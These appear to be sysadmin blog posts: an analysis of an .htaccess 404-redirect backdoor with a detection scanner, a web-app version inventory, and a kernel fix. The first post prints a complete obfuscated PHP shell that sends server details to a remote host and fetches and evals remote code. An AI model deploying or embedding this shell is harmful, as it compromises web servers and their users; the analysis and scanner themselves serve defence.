numbered filename .htaccess 404 redirect to php remote shells

June 30, 2011 at 2:36 am

A common backdoor once a host is compromised is to create, or append to existing, .htaccess files a 404 redirect which will open a remote shell to a control server when the .php is hit, usually due to legitimate crawling.  Attackers will intentionally backlink to nonexistent URLs on the compromised host so that Google et al. will do the job of opening a remote shell to their control node.  A symptom of this is a spike in load and in the number of connections in the WAITING state while the host is being crawled.

The pair of .htaccess and .php is usually generated into every single folder with unique filenames.  The filename of the php shell is usually a 4-6 character number but will sometimes be a reused dictionary regex.  The .htaccess always contains the string "ErrorDocument 404 //", with two forward slashes leading the filename.  The .htaccess is usually less than 200 bytes:

Options -MultiViews
ErrorDocument 404 //wp-content/upload/2008/11/12433.php

There is little variation in the php number shell; what varies is usually the payload and destination.  A common file size is 1474 bytes and a common string is 'aHR0cDov', which is the base-64 encoding of 'http:/'.

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="a23ab92502c0050082dd96a32c754520") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
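The indicators above (the "ErrorDocument 404 //" string, a 4-6 digit .php filename, the 'aHR0cDov' marker and the 1474-byte size) are enough to sweep a web root for this pair.  The scanner below is an added example, not code from the original post; the sample tree it builds is constructed, and the redirect target path and shell name in it are placeholders, not real indicators from any incident.  Only numerically named PHP files that also carry the base-64 marker or the common size are reported, so a legitimately numbered file does not trip it on name alone.

```python
"""Sweep a web root for the .htaccess 404-redirect / numeric PHP shell pair."""
import os
import re
import shutil
import tempfile

HTACCESS_MARKER = "ErrorDocument 404 //"   # the post says this string is always present
B64_HTTP_MARKER = b"aHR0cDov"              # base64("http:/"), common in the shell body
COMMON_SHELL_SIZE = 1474                   # byte size the post reports as common
NUMERIC_SHELL = re.compile(r"^\d{4,6}\.php$")


def check_htaccess(path):
    """Return every 404-redirect target (text after the marker) found in one .htaccess."""
    targets = []
    with open(path, "r", errors="replace") as fh:
        for line in fh:
            if HTACCESS_MARKER in line:
                targets.append(line.split(HTACCESS_MARKER, 1)[1].strip())
    return targets


def check_php(path):
    """Return the indicator names a numerically named PHP file matches."""
    hits = []
    with open(path, "rb") as fh:
        data = fh.read()
    if B64_HTTP_MARKER in data:
        hits.append("b64_http")
    if len(data) == COMMON_SHELL_SIZE:
        hits.append("size_1474")
    return hits


def scan_tree(root):
    """Walk root and return sorted (kind, relative_path, detail) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name == ".htaccess":
                for target in check_htaccess(path):
                    findings.append(("htaccess_404_redirect", rel, target))
                    # The target is document-root relative (leading "//"); if the
                    # file it points at exists on disk, report the pair explicitly.
                    shell = os.path.join(root, target.lstrip("/"))
                    if os.path.isfile(shell):
                        findings.append(("redirect_target_present", rel,
                                         os.path.relpath(shell, root)))
            elif NUMERIC_SHELL.match(name):
                hits = check_php(path)
                if hits:
                    findings.append(("numeric_php_shell", rel, ",".join(hits)))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed sample web root (not real infection data); return its path."""
    root = tempfile.mkdtemp(prefix="htaccess_scan_")
    shell_dir = os.path.join(root, "wp-content", "upload", "2008", "11")
    os.makedirs(shell_dir)
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("Options -MultiViews\n"
                 "ErrorDocument 404 //wp-content/upload/2008/11/12433.php\n")
    # Placeholder "shell": only carries the base-64 marker and does nothing.
    with open(os.path.join(shell_dir, "12433.php"), "w") as fh:
        fh.write('<?php /* constructed placeholder */ $marker = "aHR0cDov"; ?>\n')
    # A benign .htaccess (single slash) and a benign PHP file that must not be reported.
    with open(os.path.join(root, "wp-content", ".htaccess"), "w") as fh:
        fh.write("ErrorDocument 404 /404.html\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    try:
        for kind, rel, detail in scan_tree(sample):
            print("%-26s %-40s %s" % (kind, rel, detail))
    finally:
        shutil.rmtree(sample)
```

Run it against a real document root with scan_tree("/var/www/html") and treat any redirect_target_present finding as a confirmed pair worth pulling for review; the numeric_php_shell hits on their own are the follow-up list.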

Identifying script versions from source

June 28, 2011 at 11:35 pm

Dolphin         ver in inc/header.inc.php
Drupal          version in modules/drupal/drupal.info
gallery2        setGalleryVersion in modules/core/module.inc
Joomla          RELEASE  in libraries/joomla/version.php
Movable Type    version in mt-check.cgi
osCommerce      PROJECT_VERSION in includes/application_top.php
phpBB           PHPBB_VERSION in includes/constants.php
phpnuke         mysql> SELECT Version_Num FROM nuke_config;
phpwcms         version in include/inc_lib/default.inc.php
smf             index.php
tikiwiki        ./tiki-admin_security.php:              7=>'1.9.5'
VtigerCRM       vtiger_current_version in vtigerversion.php
WordPress       $wp_version in wp-includes/version.php
xcart           /VERSION
Zen Cart        ./includes/version.php
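The list above is a lookup table; turning it into a script gives you an inventory you can diff against vendor advisories.  The example below is added here and is not from the original post.  It covers only WordPress, phpBB, Joomla and osCommerce, using the file paths from the list and a regex per file; the file contents it writes for its own test are constructed samples in the shape those files take, with made-up version numbers.

```python
"""Read the installed version of a few web applications from their source files."""
import os
import re
import tempfile

# (application, file relative to the web root, regex whose group 1 is the version)
FINGERPRINTS = [
    ("WordPress", "wp-includes/version.php",
     re.compile(r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]")),
    ("phpBB", "includes/constants.php",
     re.compile(r"define\(\s*['\"]PHPBB_VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")),
    ("Joomla", "libraries/joomla/version.php",
     re.compile(r"\$RELEASE\s*=\s*['\"]([^'\"]+)['\"]")),
    ("osCommerce", "includes/application_top.php",
     re.compile(r"define\(\s*['\"]PROJECT_VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")),
]


def identify(webroot):
    """Return {application: version} for each fingerprint file present under webroot.

    A file that exists but does not match its pattern is reported as "unknown"
    so a modified or unexpected version file still shows up in the inventory.
    """
    found = {}
    for app, rel, pattern in FINGERPRINTS:
        path = os.path.join(webroot, rel)
        if not os.path.isfile(path):
            continue
        with open(path, "r", errors="replace") as fh:
            match = pattern.search(fh.read())
        found[app] = match.group(1) if match else "unknown"
    return found


def inventory(parent):
    """Run identify() over every directory directly under parent (one vhost per dir)."""
    result = {}
    for name in sorted(os.listdir(parent)):
        path = os.path.join(parent, name)
        if os.path.isdir(path):
            result[name] = identify(path)
    return result


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def build_sample_vhosts():
    """Create constructed sample web roots under one temp dir; return that dir."""
    parent = tempfile.mkdtemp(prefix="vhosts_")
    # Constructed contents; version numbers are made up.
    _write(parent, "blog/wp-includes/version.php", "<?php\n$wp_version = '3.1.4';\n")
    _write(parent, "forum/includes/constants.php",
           "<?php\ndefine('PHPBB_VERSION', '3.0.8');\n")
    _write(parent, "cms/libraries/joomla/version.php",
           "<?php\nclass JVersion {\n\tvar $RELEASE = '1.5';\n}\n")
    _write(parent, "shop/includes/application_top.php",
           "<?php\ndefine('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a');\n")
    # A version file someone has stripped: present but not parseable.
    _write(parent, "odd/wp-includes/version.php", "<?php\n// version removed\n")
    return parent


if __name__ == "__main__":
    sample = build_sample_vhosts()
    for vhost, apps in inventory(sample).items():
        print(vhost, apps)
```

Point inventory() at the directory that holds your document roots (for many hosts that is /var/www or /home/*/public_html) and compare the output against the versions you expect to be running.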

vt6415 kernel panic when enumerating IDE devices

June 10, 2011 at 1:30 am

Even though the developers tried to resolve the known issues with pata controller vt6415, I still had Ubuntu 11.04 2.6.38-8 x64 panic on enumerating IDE devices.  The solution was boot parameter libata.dma=1.